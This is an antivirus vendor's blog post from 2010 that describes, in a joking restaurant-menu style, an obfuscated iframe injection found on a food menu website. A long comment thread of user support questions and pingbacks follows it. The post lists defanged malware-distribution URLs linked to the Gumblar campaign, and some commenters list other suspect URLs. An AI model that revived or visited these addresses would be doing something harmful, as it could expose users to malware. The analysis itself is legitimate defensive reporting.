Protecting over 200 million PCs, Macs, & Mobiles – more than any other antivirus


March 19th, 2010

Would you like an iframe, sir?

Yesterday, when I was about to get something to eat, my attempt to check a menu online ended up with a warning about HTML:Iframe-LZ. Well, that’s quite spicy content of common daily offer. So, let’s look what’s under the hood.

Starter: a piece of JavaScript at the end of page – served in a nicely roasted layer of obfuscation, really delicious.

delicious script

Main course: you can choose either a speciality of Chinese cuisine delivered by hxxp://b.nt002.cn/E/J.JS (it’s fortunately down already) or a Russian saschlik that contains some popular ingredients (such as google, classmates or linkhelper) in following order - hxxp://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru: 8080/ocn.ne.jp/ocn.ne.jp/ classmates.com/linkhelper.cn/google.com/ (also down already, but these two links belong to a Gumblar system).

Dessert: a nice little snippet to carry the execution of all the malcode.

cake & coffee

Anyone else hungry out there? :-)

Categories: analyses, Virus Lab Tags: , , ,
  • http://www.ppinfotek.com Yanto Chiang

    Michal,

    I am always hungry to learn from you guys…

    Please teach me more…and more….

    cheers,

  • http://www.ppinfotek.com Yanto Chiang

    Hi Michal,

    I don’t see that avast! block one of your referenced site like :

    hxxp://www.unmaskparasites.com/security-report/?page=www.duowan.com/0910/119283364074.html

    When i opened it, then nothing happened with avast! which is detected at this site contains some suspicious link.

    cheers,
    yanto chiang

  • Chocobollz

    Hi there, in one of your post (here: /2010/02/18/ads-poisoning-–-jsprontexi/ ), there’s someone who is asking this question:

    Dawn :
    Do you need the web shield for this? I disabled that function because it worsened my surfing speed. I only use File System Shield and Behavior Shield.

    I would like to know it too, do we need to activate the webshield to detect those JS viruses or not? I ask this because I myself usually turn the webshield off because it interfering with my firewall.

    Best regards.

  • Pingback: Welcome To New York Realtors « New York Realtors

  • http://www.avast.com Michal Krejdl

    @Yanto Chiang
    I’m not certain whether duowan.com is really related to any of my references, because they were unreachable when I tried them.

  • http://www.avast.com Michal Krejdl

    @Chocobollz
    This infection was caught by Web shield. I can only suggest you to turn it on, because a vast majority of malware attacks comes from internet/surfing nowadays. Some issues with slow browsing while having web shield turned on are currently discussed here http://forum.avast.com/index.php?topic=56694.0

  • http://www.ppinfotek.com Yanto Chiang

    Michal Krejdl :
    @Yanto Chiang
    I’m not certain whether duowan.com is really related to any of my references, because they were unreachable when I tried them.

    Hi Michal,

    It’s okay,

    I randomly analyze your referenced link,
    Anyway, nice article to share with us…keep go forth to give contribution about security issues in IT world.

    cheers,
    yanto chiang

  • Chocobollz

    @Michal Krejdl
    Thank you for your reply. Anyway, speed isn’t the issue for me, the problem is, if I turn the webshield on, it makes my firewall (Outpost Firewall Pro) becomes ineffective, I mean, all of the connection requests made by the browser will be shown as came from the webshield, not the browser itself, so it kind of make my firewall useless as it cannot apply restrictions based on individual application. I just hope that Avast would place its scanner after a firewall, not before it. That would likely solve the problem.

  • http://www.avast.com Vojta – Avast support team

    Chocobollz :

    @Michal Krejdl
    Thank you for your reply. Anyway, speed isn’t the issue for me, the problem is, if I turn the webshield on, it makes my firewall (Outpost Firewall Pro) becomes ineffective, I mean, all of the connection requests made by the browser will be shown as came from the webshield, not the browser itself, so it kind of make my firewall useless as it cannot apply restrictions based on individual application. I just hope that Avast would place its scanner after a firewall, not before it. That would likely solve the problem.

    Hello,
    Webshield acts as HTTP proxy so all traffic going through the webshield to the internet. We recommend you to use our built in firewall in Avast Internet Security.

  • Pingback: Welcome To New York Realtors « New York Realtors

  • http://manges.blogghavet.com Magnus Johansson

    HI
    Sorry for posting here but i have a problem i dont now how to solve.

    Iam using comodo Dragon as my default browser and when i check my Avast settings i cant see any activity in the webshield. Comodo Dragon is a very new browser but it´s similar to Google Chrome. Webshield do not scan when i am surfing the web.
    But Avast scanner is scanning my networktraffic even if i use Comodo Dragon and when i´m switch to Internet Explorer8 everything work as it should.
    I dont wont to be unprotected when i surf the web using comodo. Can you please give me an explanation?
    Sorry, i forgot to say that i am running Comodo Dragon and Avast with Windows 7 Ultimate x86
    sorry for my bad English

  • Pingback: Planning For Cold Weather Emergency Situations | Contentedly Maladaptive

  • http://wwwavast.com jorge

    avast megustaria que ubiera un serviosio tecnico online mas seguridad

  • http://www.avast.com Vojta – Avast support team

    Magnus Johansson :

    HI
    Sorry for posting here but i have a problem i dont now how to solve.

    Iam using comodo Dragon as my default browser and when i check my Avast settings i cant see any activity in the webshield. Comodo Dragon is a very new browser but it´s similar to Google Chrome. Webshield do not scan when i am surfing the web.
    But Avast scanner is scanning my networktraffic even if i use Comodo Dragon and when i´m switch to Internet Explorer8 everything work as it should.
    I dont wont to be unprotected when i surf the web using comodo. Can you please give me an explanation?
    Sorry, i forgot to say that i am running Comodo Dragon and Avast with Windows 7 Ultimate x86
    sorry for my bad English

    Hello,
    please leave us a ticket on support.avast.com so we can handle your problem effectively and we can track our communication. Meanwhile I am going to test the browser.

  • http://www.avast.com Vojta – Avast support team

    @Magnus Johansson
    Hello,
    good news Magnus
    Within next 48 hours you will receive new VPS update and Avast Webshield will scan the Comodo Dragon packets. So just keep your VPS updates running.

  • spg SCOTT

    @Vojta – Avast support team

    Interesting, there was a question about this on the forum…

    So the OptinProcess will not be needed anymore?

    The thread: http://forum.avast.com/index.php?topic=57721

    -Scott-

  • GW Anderson

    Thank you for today’s (29 March, 2010) blog “Why does http://www.avast.eu take me to the Avira website?…..or isn’t security built on trust?”

    I have my own problems with Avira. It is helpful to know this information in order that I may help those who truly want avast! Do not be misled. You are correct. Trust is very important.

    Thank you again.

    GWA

  • http://www.avast.com Michal Krejdl

    @GW Anderson
    This domain is owned by Avira since 2006. Our official domain is avast.com.

  • GW Anderson

    Thank you. I do not understand the RSS feed which I mentioned in the above note which came this morning.

  • http://www.avast.com Michal Krejdl

    @GW Anderson
    Oh, now I can see it. I was a bit confused, because the article is not available except those RSS readers that caught it.

  • GW Anderson

    Was the article withdrawn? When I went to the website to view the complete article, I was ‘welcomed’ to the Error 404 page.

    Thanks for responding.

    • http://www.avast.com Vincent Steckler

      Sorry for that. Hit the publish button before it was ready. It is there now.

  • Pingback: Mongolia winter kills herds » Mongolian, OpenX, Cross, News, Mongolias, Tenth » Environmental Development Group

  • Pingback: Abu Dhabi building carbon-neutral city » World, OpenX, Dhabi, Treatment, Center, Readability » Environmental Development Group

  • Pingback: From CO2 to Cement: Recycling Carbon – the Commoditization of Carbon Emissions » Energy, OpenX, Peabody, News, Release, Carbon » Environmental Development Group

  • Pingback: Horses Never Forget Human Friends » Research, Horses, French, Trainer, ADVERTISEMENT, Behavior » Environmental Development Group

  • Pingback: Eggshell of extinct giant bird provides ancient DNA » Research, University, News, Archaeology, Schwenninger, Madagascar » Environmental Development Group

  • Pingback: Electric Cars on the Move in Germany » Harz, Electric, Power, Drug, Ghana, Center » Environmental Development Group

  • Pingback: Apple iPad Website | iPAD Tablet - AppleSite

  • Pingback: What To Do In Virginia Beach | Virginia Beach Tourist Guide

  • http://manges.blogghavet.com magnus johansson

    @Vojta – Avast support team.
    comodo still dont work with Avast 5.0. I have reinstalled Avast like you suggested and i also reinstalled Comodo. Can you solve this or i am consider uninstall Avast and try something else.
    @Scott. I modified the ini. file and it did the trick but why should i need to do that for? This bug in Avast or Comodo can´t be impossible to fix. I have been in contact with both Avast support and the Comodo support and both said the problem is solved. Is it me and my computer or what?

  • spg SCOTT

    @magnus johansson

    It is not necessarily a bug in either.
    As I know it there is a list of browsers that are scanned by default (e.g. IE, Fx, the other mainstream browsers) and Dragon is not currently on that list.

    I am not quite sure as to why this is but it is the way that it is done.

    The INI modification is a workaround of sorts, and adds dragon to be scanned.

    The way I see it is that Dragon is not so well known to the ALWIL devs and so they have to look into it before it gets scanned.

    It was initially also the same with Chrome, but now it is supported by default.

    -Scott-

    p.s. Glad the thread helped :)

  • http://manges.blogghavet.com Magnus Johansson

    Problem solved.
    The latest VPS update did the trick. Feels so good!
    Thanks everyone who helped me with this especially @Scott and @Vojta – Avast support team

  • spg SCOTT

    You’re Welcome :)

  • http://www.avast.com Vojta – Avast support team

    spg SCOTT :

    @Vojta – Avast support team

    Interesting, there was a question about this on the forum…

    So the OptinProcess will not be needed anymore?

    The thread: http://forum.avast.com/index.php?topic=57721

    -Scott-

    Hello,
    it is already in the Avast code so there is no need to add it manually.

  • spg SCOTT

    @Vojta – Avast support team
    Hi,

    Yes, I saw that in the thread and in Magnus Johansson’s post :D

    -Scott-

  • spg SCOTT

    @Vojta – Avast support team
    As a side note, maybe the knowledge-base article on the subject could be updated for version 5?

  • Mario

    Hi trend micro detected this website hxxp://www.swfcabin.com/open/1243702443 as malware and i went on the website on my home computer and i’m scared my computer is infected with the malware can you get avast home the free antivirus to detect it please im begging you im very scared and i just payed $100 dollars to have my computer fixed so please get avast! home the free antivirus version to detect the malware. so please get avast home the free antivirus to detect it

  • http://www.avast.com Vojta – Avast support team

    @spg SCOTT
    Do you mean article about this particular browser or general note about adding the browser into the webshield?

  • spg SCOTT

    I was thinking about this one:
    http://support.avast.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=374

    Maybe it could be updated to include the ones that are scanned in V5

    And possibly have it show how to optin one that is not scanned?

    -Scott-

  • http://www.avast.com Vojta – Avast support team

    @spg SCOTT
    Hello Scott,
    it will be updated.

  • spg SCOTT

    @Vojta – Avast support team

    Cool, Thanks :)

    The more knowledgebase articles we have, the better ;)

    -Scott-

  • http://Verizon Patti

    Please cancel my avast anti-virus and e-mail me the results in cancelling this system from my computer.

    Patti
    2YA7

  • http://Verizon Patti

    Please notify me of system being off my computer. There is no cancelling information and I no longer want it on my computer. E-mail me these results of no longer having avast on my computer. As soon as possible I want it off my computer, and a response from you. Send response to psasala@verizon.net
    Thank You,
    Patti Sasala